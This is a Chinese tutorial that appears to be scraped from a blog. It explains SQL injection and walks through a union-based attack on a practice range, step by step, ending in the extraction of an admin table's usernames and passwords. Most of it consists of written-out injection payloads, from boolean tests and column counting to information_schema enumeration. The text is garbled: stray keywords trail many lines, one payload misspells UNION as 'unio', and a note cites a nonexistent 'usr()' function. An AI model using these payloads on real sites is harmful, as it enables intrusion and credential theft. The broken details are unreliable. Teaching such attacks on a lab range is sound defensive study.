SQL注入原理解析以及举例1

时间 2019-12-18

标签 sql 注入原理解析以及举例栏目 SQL 繁體版

原文原文链接

　　sql注入是指web应用程序对用户输入数据的合法性没有判断，致使攻击者能够构造不一样的sql语句来实现对数据库的操做。mysql

　　sql注入漏洞产生知足条件：web

　　　　1；用户可以控制数据的输入。sql

　　　　2；本来须要执行的代码，拼接了用户的输入。数据库

　　举例：测试

　　注意：下面测试环境使用封神台免费靶场。能够从下面连接进入：https://hack.zkaq.org/?a=battle。网站

　　攻击流程：3d

　　　　1；判断是否存在sql注入漏洞。orm

　　　　2；判断网页存在字段数。blog

　　　　3；判断回显点。排序

　　　　4；获取信息。

　　测试开始：

　　　　测试目标获取管理员帐号密码

　　　　一；判断是否存在sql注入漏洞。

　　　　　　1.1；构建sql语句：?id=1 and 1=2 查看页面是否正常。结果页面显示不正常。

　　　　　　注释：由于id=1为真（可正常访问页面），且1=2为假，因此and条件永远不会成立。对于web应用不会返回结果给用户。则攻击者能看到的是一个错误的界面或者页面结果为空。固然，若是攻击者构造的请求异常，也会致使页面访问不正常。

　　　　　　1.2；构建新的sql语句，肯定是否存在语句逻辑错误致使页面不正常。?id=1 and 1=1 结果页面正常，初步判断存在sql漏洞。

　　　　　　注释：1=1 为真，and条件语句成立。

　　　　二；判断字段数：

　　　　　　2.1；构建sql语句：?id=1 and 1=1 order by 1 判断网页是否正常。?id=1 and 1=1 order by 2 判断网页是否正常。?id=1 and 1=1 order by 3 判断网页是否正常。结果：?id=1 and 1=1 order by 3 网页显示不正常，能够判断字段数为2

　　　　　　注释：order by 语句用来根据指定的列对结果集进行排序。详细请参考网址：http://www.w3school.com.cn/sql/sql_orderby.asp　“order by 1”表示对第一栏位进行排序，

　　　　三；判断回显点：构建sql语句：?id=1 and 1=2 union select 1,2 (以后的查询结果将显示在下图红框位置)

　　　　　　注释：union 操做符用于合并两个或多个select语句的结果集，union内部的select语句必须拥有相同数量的列。详细参考：http://www.w3school.com.cn/sql/sql_union.asp

　　　　四；获取信息

　　　　　　4.1；查看当前数据库名以及数据库版本。构建sql语句：?id=1 and 1=2 union select 1,database()；?id=1 and 1=2 unio select 1, version()

　　　　　　注释：union select 1 ,database(),其中数字1占一列，凑数，用来知足union定义。database()：表示网站使用的数据库，version()：表示当前mysql的版本，usr()：当前mysql的用户。

　　　　　　4.2；查询当前数据库以及表名称。构建sql语句：?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

　　　　　　注释：information_schema数据库用于存储数据库元数据，例如：数据库名，表名，列的数据类型，访问权限等。tables用来存储数据库中的表的信息，包括表属于哪一个数据库，表的类型，存储引擎，建立时间等。table_schema和table_schema是表tables中的数据库库名和表名。limit 0,1 表示第一行显示一行数据。limit 1,1表示第二行显示一行数据。

　　　　　　4.3；查询表admin中的字段名。查询三个字段：ID username password

　　　　　　构建SQL语句：?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

　　　　　　构建SQL语句：?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1

　　　　　　构建SQL语句：?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

　　　　　　注释：columns表存储表中的列的信息。其中包含数据库库名table_schema,表名table_name ，字段名column_name。

　　　　　　4.4；查询用户名称：?id=1 and 1=2 union select 1,username from admin

　　　　　　4.5；查询密码：?id=1 and 1=2 union select 1,password from admin